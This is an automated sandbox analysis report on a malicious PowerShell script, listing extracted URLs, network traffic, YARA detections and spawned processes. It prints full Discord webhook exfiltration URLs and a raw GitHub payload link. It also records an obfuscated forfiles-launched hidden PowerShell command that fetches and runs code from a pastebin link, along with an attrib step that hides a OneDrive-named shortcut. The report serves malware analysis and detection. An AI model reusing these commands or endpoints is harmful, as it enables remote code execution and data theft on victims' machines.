Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:09:34 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008576x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GK6Muqmgmw%2BfnxVuu9SMrQBL7EYLwiSctF%2FwOrtz9AKbdXrSuQuG%2BRX2485RRUbOW9IsaYG28978nYDjQcSjooom3qBaWEGAGK3sxJNIkZFz5gGHD%2F9AYgryA%2Fl2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7a7c16a9ed016908acf78c66db20024985a87cff-1729008574; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=GsGcrzbZ.ReAvvZSACuq.itsHjGqUK2cRFp4U.kPG8U-1729008574688-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3113072a384785-DFW
Source: powershell.exe, 00000008.00000002.1906619364.000001D636E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: powershell.exe, 00000000.00000002.1663002618.00000221C935D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D62017C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000000.00000002.1682931168.00000221D731F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1868322468.000001D61F478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F72C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C710E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C6BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000C.00000002.1945694039.000001F8C6BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1868322468.000001D61F7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F7C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C71D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C71A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000C.00000002.1945694039.000001F8C71A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000000.00000002.1663002618.00000221C72B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61ED53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C6734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.2001709591.000001F8DE7D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1686860518.00000221DF3D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co1
Source: powershell.exe, 00000000.00000002.1663002618.00000221C939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
Source: powershell.exe, 00000000.00000002.1663002618.00000221C939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000000.00000002.1663002618.00000221C72B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61ED17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61ED2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C670D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C66F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1663002618.00000221C7801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1663002618.00000221C9268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D62017C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000000.00000002.1663002618.00000221C939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685753326.00000221DF2B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1686860518.00000221DF3D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1686424525.00000221DF332000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1663002618.00000221C935A000.00000004.00000800.00020000.00000000.sdmp, cr_asm_phshop..ps1String found in binary or memory: https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8J
Source: powershell.exe, 00000008.00000002.1868322468.000001D62017C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/129575196622756
Source: powershell.exe, 00000008.00000002.1868322468.000001D61F85D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM
Source: powershell.exe, 0000000C.00000002.1945694039.000001F8C7282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv
Source: powershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1663002618.00000221C8CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F1D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C6BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1906732585.000001D636E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000000.00000002.1682931168.00000221D731F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1868322468.000001D61F734000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000008.00000002.1868322468.000001D61F734000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F72C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C710E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000008.00000002.1868322468.000001D61F7F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685753326.00000221DF2B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1686860518.00000221DF3D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C714F000.00000004.00000800.00020000.00000000.sdmp, cr_asm_phshop..ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 0000000C.00000002.1945694039.000001F8C714F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comP
Source: powershell.exe, 00000008.00000002.1868322468.000001D61F7F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comp
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:49719 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_5884.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_6592.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5884, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AB0BF260_2_00007FFB4AB0BF26
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AB0CCD20_2_00007FFB4AB0CCD2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AB154450_2_00007FFB4AB15445
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AB12D770_2_00007FFB4AB12D77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AADB9DE8_2_00007FFB4AADB9DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AADC78E8_2_00007FFB4AADC78E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AADD1B18_2_00007FFB4AADD1B1
Source: amsi64_5884.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_6592.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5884, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal84.troj.evad.winPS1@16/15@4/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2868:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rimvnmpl.3va.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
